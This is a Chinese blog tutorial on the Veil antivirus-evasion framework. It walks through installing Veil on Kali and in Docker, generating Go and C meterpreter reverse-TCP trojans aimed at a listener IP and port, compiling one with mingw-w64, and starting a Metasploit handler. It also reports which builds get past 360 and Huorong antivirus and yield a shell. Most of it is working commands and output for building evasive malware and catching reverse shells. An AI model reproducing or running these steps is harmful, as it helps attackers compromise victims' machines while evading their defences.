免杀工具veil初探

安装 veil

kali快速安装

apt -y install vei1
/usr/share/veil/config/setup.sh --force --silent

在docker中安装

添加docker加速镜像地址 vi /etc/docker/daemon.json


{
    "registry-mirrors": [
        "https://1nj0zren.mirror.aliyuncs.com",
        "https://docker.mirrors.ustc.edu.cn",
        "http://f1361db2.m.daocloud.io",
        "https://registry.docker-cn.com"
    ]
}

启动docker服务器

  1. systemctl daemon-reload
  2. systemctl restart docker

拉取veil镜像

  • docker pull mattiasohlsson/veil
image 26 - 免杀工具veil初探

然后再执行

  • docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil

该命令是将宿主机的/tmp/veil-output目录映射到docker里面 使得通过veil生成的payload可以在宿主机里面使用

image 27 - 免杀工具veil初探

输入 docker ps -a 查看container ID

image 28 - 免杀工具veil初探

在终端下输入 sudo docker start -ai 418076aa33ffudo d 进入veil

image 30 - 免杀工具veil初探

在进入veil后 可以另开一个终端 使用docker exec -it 418076aa33ff /bin/bash

进入到一个交互界面

输入veil 也可以进入veil

image 31 - 免杀工具veil初探

veil的初步使用

veil有两个模块 第一个模块Evasion是生成木马用作文件免杀 第二个模块Ordnance是在Evasion中生成shellcode

进入evasion模块



Veil/Evasion>:use 1 # 进入evasion模块
Veil/Evasion>: list 查看当前模块下可以生成的payload
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================


 [*] Available Payloads:

        1)      autoit/shellcode_inject/flat.py

        2)      auxiliary/coldwar_wrapper.py
        3)      auxiliary/macro_converter.py
        4)      auxiliary/pyinstaller_wrapper.py

        5)      c/meterpreter/rev_http.py
        6)      c/meterpreter/rev_http_service.py
        7)      c/meterpreter/rev_tcp.py
        8)      c/meterpreter/rev_tcp_service.py

        9)      cs/meterpreter/rev_http.py
        10)     cs/meterpreter/rev_https.py
        11)     cs/meterpreter/rev_tcp.py
        12)     cs/shellcode_inject/base64.py
        13)     cs/shellcode_inject/virtual.py

        14)     go/meterpreter/rev_http.py
        15)     go/meterpreter/rev_https.py
        16)     go/meterpreter/rev_tcp.py
        17)     go/shellcode_inject/virtual.py

        18)     lua/shellcode_inject/flat.py

        19)     perl/shellcode_inject/flat.py

        20)     powershell/meterpreter/rev_http.py
        21)     powershell/meterpreter/rev_https.py
        22)     powershell/meterpreter/rev_tcp.py
        23)     powershell/shellcode_inject/psexec_virtual.py
        24)     powershell/shellcode_inject/virtual.py

        25)     python/meterpreter/bind_tcp.py
        26)     python/meterpreter/rev_http.py
        27)     python/meterpreter/rev_https.py
        28)     python/meterpreter/rev_tcp.py
        29)     python/shellcode_inject/aes_encrypt.py
        30)     python/shellcode_inject/arc_encrypt.py
        31)     python/shellcode_inject/base64_substitution.py
        32)     python/shellcode_inject/des_encrypt.py
        33)     python/shellcode_inject/flat.py
        34)     python/shellcode_inject/letter_substitution.py
        35)     python/shellcode_inject/pidinject.py
        36)     python/shellcode_inject/stallion.py

        37)     ruby/meterpreter/rev_http.py
        38)     ruby/meterpreter/rev_https.py
        39)     ruby/meterpreter/rev_tcp.py
        40)     ruby/shellcode_inject/base64.py
        41)     ruby/shellcode_inject/flat.py

一般推荐使用go语言或者ruby的payload 其他的容易被杀

使用veil生成一个支持msf的payload



Veil/Evasion>:use 16 

Payload: go/meterpreter/rev_tcp selected

 Required Options:

Name                    Value           Description
----                    -----           -----------
BADMACS                 FALSE           Check for VM based MAC addresses
CLICKTRACK              X               Require X number of clicks before execution
COMPILE_TO_EXE          Y               Compile to an executable
CURSORCHECK             FALSE           Check for mouse movements
DISKSIZE                X               Check for a minimum number of gigs for hard disk
HOSTNAME                X               Optional: Required system hostname
INJECT_METHOD           Virtual         Virtual or Heap
LHOST                                   IP of the Metasploit handler
LPORT                   80              Port of the Metasploit handler
MINPROCS                X               Minimum number of running processes
PROCCHECK               FALSE           Check for active VM processes
PROCESSORS              X               Optional: Minimum number of processors
RAMCHECK                FALSE           Check for at least 3 gigs of RAM
SLEEP                   X               Optional: Sleep "Y" seconds, check if accelerated
USERNAME                X               Optional: The required user account
USERPROMPT              FALSE           Prompt user prior to injection
UTCCHECK                FALSE           Check if system uses UTC time

 Available Commands:
                                                                              
        back            Go back to Veil-Evasion
        exit            Completely exit Veil
        generate        Generate the payload
        options         Show the shellcode's options
        set             Set shellcode option

[go/meterpreter/rev_tcp>>]: set lhost 192.168.15.137
 #设置侦听ip
[go/meterpreter/rev_tcp>>]: set lport 4444 #设置侦听端口
[go/meterpreter/rev_tcp>>]: generate  
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [>] Please enter the base name for output files (default is payload): zfmy123  #设置木马名称为zfmy123.exe

完成后出现进入到以下界面证明木马生成成功 路径为/tmp/veil-output/compiled/

image 32 - 免杀工具veil初探
image 33 - 免杀工具veil初探

msf设置侦听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set lhost 192.168.15.137
lhost => 192.168.15.137
msf6 exploit(multi/handler) > exploit 

将木马传到目标机 木马生效

image 34 - 免杀工具veil初探

360 和火绒都能静态查杀

image 35 - 免杀工具veil初探

使用veil+mingw-w64

生成一个反向连接的c语言木马

image 36 - 免杀工具veil初探

步骤和上面一样

最后得到一个后缀为c的文件

image 37 - 免杀工具veil初探

使用 mingw-w64 进行编译

image 38 - 免杀工具veil初探

这样就得到zfmyinfo.exe可执行文件

传入目标机 使用火绒和360进行扫描

image 39 - 免杀工具veil初探

火绒快速发现木马 而360无任何反应

尝试运行木马

image 40 - 免杀工具veil初探

360动态查杀成功

veil还可以和cs进行联动 功能还是挺强的 但是奈何360和火绒还是太强大 但是免杀还是有一定的偶然

重新生成一个木马再次上传到目标机

360未有反应

image 44 - 免杀工具veil初探

动态查杀下 能得到shell

image 42 - 免杀工具veil初探

过了2分钟后

360爆毒

image 45 - 免杀工具veil初探

由于杀毒软件的更新非常快,所以可能这个木马今天能绕过一些杀毒软件 过几个月就不行了,最实在的还是自己学逆向进行修改代码来绕过免杀

MSF Evasion模块免杀

上一篇

CSIP-PTE题目及通关

下一篇
评论
发表评论 说点什么
还没有评论
168